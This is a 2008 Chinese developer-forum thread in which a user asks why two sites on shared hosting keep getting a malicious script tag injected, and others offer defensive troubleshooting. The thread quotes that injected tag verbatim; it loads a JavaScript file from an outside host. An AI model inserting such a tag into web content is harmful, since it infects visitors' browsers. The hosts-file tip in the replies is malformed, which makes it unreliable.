网站被攻击的问题

欢迎您:游客帮助

我参与的帖子

网站被攻击的问题 [已结帖,结帖人:jack09596]

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869
结帖率：100.00%

发表于：2008-08-08 10:02:44 楼主

有2个网站老是被攻击被插入代码
<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"> </script>
烦死了，都是同一种，我查了注入也没查出什么来,网上有扫描SQL注射与XSS攻击的牛B工具我也用了，进行扫描也没扫出问题来
再用ASPSecurity v1.6 SP2也没有发现问题就是木马文件，但是老被挂上那个字符窜
我把admin的表改为admin0 username password 分别都改为其他字符了，还是被干掉了
我现在不知道从哪里入手了,请高手指点了

问题点数：100 回复次数：18 修改删除举报引用回复

icanplay2008
武夷王牧
等级:
可用分等级：贫农
总技术分：59
总技术分排名：118337

发表于：2008-08-08 10:09:261楼得分:0

提供一个解决方法，把http://conn.ch.ma这个网址转向到本机，他就不会执行代码了。。

修改Hosts文件

用记事本打开，在最后加入
http://conn.ch.ma localhost

参考：http://baike.baidu.com/view/597330.htm

就可以了，当然了，这个只是不让他执行木马，真正的漏洞还是要找的！

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-08 10:11:142楼得分:0

请教楼上Hosts文件？？我这里用的是人家的，是虚拟主机而已

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-08 10:12:083楼得分:0

怎么看出，是被注入了，还是服务器有问题呢,现在我这个还没确定，所以都不好往下结论

修改删除举报引用回复

froole
loveapple
等级:
可用分等级：贫农
总技术分：2216
总技术分排名：10393

发表于：2008-08-08 10:12:394楼得分:0

引用 1 楼 icanplay2008 的回复:
提供一个解决方法，把http://conn.ch.ma这个网址转向到本机，他就不会执行代码了。。

修改Hosts文件

用记事本打开，在最后加入
http://conn.ch.ma localhost

参考：http://baike.baidu.com/view/597330.htm

就可以了，当然了，这个只是不让他执行木马，真正的漏洞还是要找的！

掩耳盗铃?
自己骗自己有什么用.

建议lz跟服务器管理员联系一下。
这条数据未必是从跑asp的主机上被插入的。

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-08 10:17:535楼得分:0

请教楼上的,你的意思是说服务器局域网的问题？如果服务器有问题的话，那所有网站都被插入脚本，那样的话，那个空间商也会察觉啊
不过我那2个网站都是在一个空间上.都被插入同一种代码.
不过不管怎么样，我现在就想知道，怎么查出是服务器问题还是自己网站的安全系数不够好

修改删除举报引用回复

chinmo
藏*无限
等级:
可用分等级：富农
总技术分：70382
总技术分排名：100
2

6

2

发表于：2008-08-08 11:35:056楼得分:0

用工具不一定都能检查出漏洞的

修改删除举报引用回复

ld2099
我不是程序员www.chxwei.com
等级:
可用分等级：富农
总技术分：6492
总技术分排名：3229

发表于：2008-08-08 11:41:437楼得分:30

你把网址发上来，大家帮你测试看看

中木马了

1、你的站代码有漏洞或者已经在网站目录里留下文件：
认真检查你代码，认真检查ftp中所有可疑文件

2、你服务器上其他网站有漏洞，被传了木马，但是服务器没有设置好导致可以通过木马访问服务器内所有文件，于是全部中了

修改删除举报引用回复

45Ter
方便面
等级:
可用分等级：中农
总技术分：2710
总技术分排名：8012

发表于：2008-08-08 11:49:358楼得分:10

有可能是跨站注入进去的！
自己检查下自己网站代码，然后联系下管理员，让他检查下同服务器内的其他网站是否有漏洞！

修改删除举报引用回复

CainLai
初拥
等级:
可用分等级：贫农
总技术分：183
总技术分排名：63710

发表于：2008-08-08 12:30:549楼得分:0

帮顶学习～

修改删除举报引用回复

BoyHaXin
积极面对！
等级:
可用分等级：富农
总技术分：2581
总技术分排名：8332

发表于：2008-08-08 12:45:2410楼得分:0

UP,帮顶...

修改删除举报引用回复

gingerkang
gingerkang
等级:
可用分等级：中农
总技术分：8786
总技术分排名：2265

发表于：2008-08-08 12:48:0611楼得分:0

代码插在什么地方了?修改了网站文件,还是篡改了数据库,还是文件数据都正常,在浏览网站的时候有时有加有时没有?
搞清楚问题,再想办法,不要跟个无头苍蝇一样,拿个所谓的工具法宝就去扫描

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-08 14:16:2212楼得分:0

http://www.phonetechhk.com 这个网站那个js文件不是放在数据库里面的，我替换的话，只需要替换根目录下的文件和inc下的文件就可以解决了

修改删除举报引用回复

chinmo
藏*无限
等级:
可用分等级：富农
总技术分：70382
总技术分排名：100
2

6

2

发表于：2008-08-08 14:24:4813楼得分:0

你用网上什么程序改的？
感觉你用的这个程序很熟悉啊

用网上的程序后门很多的

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-08 14:36:2214楼得分:0

这个网站不是我的，我就是帮以前的朋友看的，他的网站老被攻击,叫我帮他看

修改删除举报引用回复

chinmo
藏*无限
等级:
可用分等级：富农
总技术分：70382
总技术分排名：100
2

6

2

发表于：2008-08-08 16:51:4315楼得分:0

使用的是通用防注代码，没什么用
如果是网上的代码一般都有后门的
比如编辑器的或者上传

修改删除举报引用回复

chinmo
藏*无限
等级:
可用分等级：富农
总技术分：70382
总技术分排名：100
2

6

2

发表于：2008-08-08 16:52:0416楼得分:60

使用的是通用防注代码，没什么用
如果是网上的代码一般都有后门的
比如编辑器的或者上传

修改删除举报引用回复

jhwcd
机器猫
等级:
可用分等级：小地主
总技术分：13988
总技术分排名：1138

发表于：2008-08-08 16:55:2217楼得分:0

引用 14 楼 jack09596 的回复:
这个网站不是我的，我就是帮以前的朋友看的，他的网站老被攻击,叫我帮他看

哦，可能是程序有漏洞，最好不IIS日志下载下来看看，具体是哪个程序有漏洞。

修改删除举报引用回复

jack09596
人家都叫我菜鸟
等级:
可用分等级：长工
总技术分：62
总技术分排名：114869

发表于：2008-08-21 09:18:0618楼得分:0

是啊，我重新换过了一个编辑器就OK了

修改删除举报引用回复

将帖子提前放进我的网摘推荐给好友

我要提问帖子加分结帖去... 管理菜单

网站简介－广告服务－网站地图－帮助－联系方式－诚聘英才－English－问题报告
北京创新乐知广告有限公司版权所有京 ICP 证 070598 号
世纪乐知(北京)网络技术有限公司提供技术支持
Copyright © 2000-2008, CSDN.NET, All Rights Reserved